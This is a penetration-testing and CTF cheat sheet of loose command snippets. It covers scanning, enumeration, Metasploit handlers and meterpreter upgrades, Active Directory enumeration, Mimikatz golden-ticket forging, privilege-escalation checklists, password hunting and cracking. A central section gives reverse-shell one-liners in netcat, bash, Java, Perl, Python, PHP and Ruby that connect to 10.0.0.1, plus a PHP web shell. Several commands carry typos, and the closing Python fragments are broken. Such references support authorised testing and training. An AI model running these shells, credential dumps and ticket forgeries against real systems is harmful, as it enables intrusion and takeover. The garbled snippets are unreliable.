Sometimes we just forget how to use a tool. Here is a list of useful snippets for penetration testing and CTFs.
- Cryptography
- Forensics
- Web
- Pwn/Reversing
- tmux
- nmap
- metasploit
- scapy
- ARP
- netdiscover
- DNS
- whois
- nslookup
- host
- dig
- fierce
- DNSenum
- DNSrecon
- Sublist3r
- E-mail
- The Harvester
- http
- dirb/dirbuster
- gobuster
- nikto
- wpscan
- sqlmap
- Active Directory
- Basics
- Enumeration
- Lateral Movement
- Domain Privesc
- Persistence
- Trust Privesc
- SNMP
- onesixtyone
- SNMPwalk
- SMB
- rpcclient
- smbclient
- smbmap
- enum4linux
- Windows
- cmd
- Powershell
- WMIC
- evil-winrm
- winpeas link
- Empire
- NIX
- abd
du -hs directory/
cut -b 7- rpcclientusers | cut -d "]" #Parse list from enumuserinfo
#Enable mouse (Cannot copy past anymore)
set-window-option -g mode-mouse on
set -g mouse-select-pane on
#Change ssh config (Kali linux)
vim /etc/ssh/ssd_config
PermitRootLogin yes
./forticlientsslvpn_cli --server server:443 --vpnuser aloha < password
#Enable ssh on guest machine (Mac)
ifconfig vboxnet0
auth eth1
iface eth1
address 192.168.56.10
netmast 255.255.255.0
sudo ifup eth1
rlwrap nc -nvvv 127.0.0.1 4444
rlwrap nc -nlvp 4444
Upgrade to Meterpreter shell
#Setup Listener
msfconsole
use exploit/multi/handler
set lhost 10.10.10.10.
set lport 4444
set payload linux/x86/shell_reverse_tcp
run
run -j -- to run as a job automatically
#Method 1
CTRL+Z
sessions -u [session id]
sessions -u 1
sessions
sessions -i [new session id
#Method 2
use post/multi/manage/shell_to_meterpreter
set session 1
run
sessions
sessions -i 2
nmap -sn 10.10.10.0/24 #ping scan
nmap -sT 10.10.10.10 #connect scan
nmap -sS 10.10.10.10 #SYN scan
nmap -sU 10.10.10.10 #UDP scan
nmap -sV 10.10.10.10 #Version fingerprinting
nmap -O 10.10.10.10 #Detect OS
nmap -A 10.10.10.10 #Agressive
nmap -p- 10.10.10.10
nmap -6 [:] #ipv6
#Fast scanning all ports
masscan -p1-65535,U:1-65535 127.0.0.1 --rate=1000 -e tun0
nmap -T5 --open -sS -vvv --min-rate=1000 --max-retries=2 -p- -oA full-ports 10.10.10.x
Advanced
nmap -f 10.10.10.10 #fragments
nmap -mtu 8 10.10.10.10 #transmission in bytes
nmap -D RND:10 10.10.10.10 #10 decoy address
nmap -sI 10.2.2.2 10.10.10.10 #10.2.2.2 as zombie idle machine
nmap --source-port 54 10.10.10.10 #Force using port 54
nmap --data-length 25 10.10.10.10 #Add random data to probe packets
nmap 10.10.0.0/11 -sT -sV -Pn -n -vvv --min-rate=5000 --min-hostgroup=256 --min-parallelism=256
nmap -Pn -vvv -sC --script=firewalk -p1-65535 -D RND:10 10.10.10.10 #map firewall rules
nmap scripts
ls -l /usr/share/nmap/scripts/http*
nmap --script-help ftp-anon
nmap --script=http-robots.txt 10.10.10.10
tnmap
masscan -p1-65535,U:1-65535 10.10.10.0/24 --rate=1000 =e tun0
search mongo
search cve:2019 type:exploit
search cve:2018 platform:windows
back
exit
info
help show
show payloads
save
show advanced
set displayablepayloadhandler true
show encoders
show nops
show evasion
hashdump
sessions -i 7
sysinfo
ps
getpid
hashdump
getprivs
getsystem
migrate 170
kaodic
netdiscover -r 10.10.10.0/24
ettercap -G
dig -t mx umich.com
dig -t any umich.com
dig AXFR yourdomain.coom @xfrout1.dynect.net
fierce -dns umich.edu
fierce -dns umich.edu --wordlist /usr/share/wordlist
whois umich.edu
dnsenum umich.edu
dnsrecon -d umich.edu
sublist3r -d google
onesixtyone 10.10.10.10
snmpwalk -v 1 -c public 10.10.10.10
snmapwalk -v2c -c public 10.10.10.19 1.3.6.1.2.1.4.34.1.3 #Full scan
enyx 1 public 10.10.10.10
rpcclient -U "" 127.0.0.1
querydominfo
enumdomusers
smbclient -L //127.0.0.1 #List shares
mount -t cifs //127.0.0.1/Backups /mnt/smb #Mount share
smbclient //10.10.10.10/share -I -N #Interactive + No-pass
smbmap -H 127.0.0.1
smbmap -u DoesNotExit -H 127.0.0.1
enum4linux 127.0.0.1
dirb http://10.10.10.10 /usr/share/dirb/wordlists
gobuster dir -u https://127.0.0.1 -x .php,.html
nikto -h http://10.10.10.10
HTTP Header info
curl -i http(s)://10.10.10.10
curl --include
Use soecific request METHOD like POST or PUT
curl -X POST http(s)://10.10.10.10
Grab everything from website
curl -i -L 10.11.1.111
Ignore TLS on https websites
curl --insecure https://10.10.10.10
Invoke-WebRequest http(s)://10.10.10.10
Invoke-WebRequest -METHOD 'POST' http(s)://10.10.10.10
PowerView
Get-NetDomain
Get-NetDomain -Domain powershell.local
Get-DomainSID
Get-ADDDomain
Get-AddDomain -Identity powershell.local
(Get-ADDomain).DomainSID.Value
Get-NetDomainController
Get-NetDomainController -Domain powershell.local
Get-ADDomainController
Get-ADDomainController -Discover -DomainName powershell.local
Get-NetUser
Get-NetUser -Domain powershell.local
Get-NEtUser -UserName labuser
Get-ADUser -Filter * -Properties *
Get-ADUser -Server ps-dc.pwershell.local
Get-ADUser -Identity labuser
Golden Ticket Silver Ticket
Trust Tickets krbtgt hash Child to Forest Root
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::gold /user:Administrator /domain:offensiveps.powershell.local /sid:S-1-5- /krbtgt:a9d1 /sids:s-1-5 /ticket:krb_tkt.kirbi"'
evil-winrm -i 127.0.0.1 -u aloha -p aloha123
Checklist
- Misconfigured services
- Replaceable services
- Configuration files and data containing passwords
- Registry settings
- Information stored in registry
Checklist
- Config files
- SUID binaries
- Scheduled jobs
- Running application/Services
- Distribution
- Kernel version
Config files
ls -ls /etc/ | grep .conf
ls -ls /var/www/html
SUID binaries
find /* -user root -perm -4000 -print 2>/dev/null
Crontab
pspy64 -pf -i 1000 #print commands/file system events and scan procfs every second
nc/ncat
nc -nlvp 4444
nc -nvvv 10.10.10.10 4444 -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
bash
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php system($_GET['aloha']); ?>
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
xterm
xterm -display 10.0.0.0:1
xhost +targetip
Xnest :1 #Listener
stty
nc -nlvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export SHELL=bash
export TERM=xterm-256color
rlwrap
rlwrap nc -nlvp 4444
ipcalc 122.64.0.0 - 122.95.255.255
ipcalc 122.64.0.0/11
find / -name foo.txt -type f -print #print not necessary
find /opt /usr /var -name config -type f
find . -iname config #search case insensitive
grep 'password' /etc/config #search for 'password' in config (quotes not necessary)
grep 'password' * #search all files in current directory
egrep 'password|secret' * #search multiple strings
grep -l config *.php #search for filenames containing the string 'config'
grep -il config *.php #same but case insensitive
grep -rl 'password' . #same but recursive in current directory
grep -ir 'username' /directory/*
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Convert IPv6 to hex
s = ""
s = s.split(".")
ip = ""
for i in is:
ip += hex(int(i))[2:].rjust(2, '0')
print ip
Zlib decompress
s = 'aloha'
b = bytearray.fromhex(s)
f = open('elf', 'wb')
f.write(z)
f.close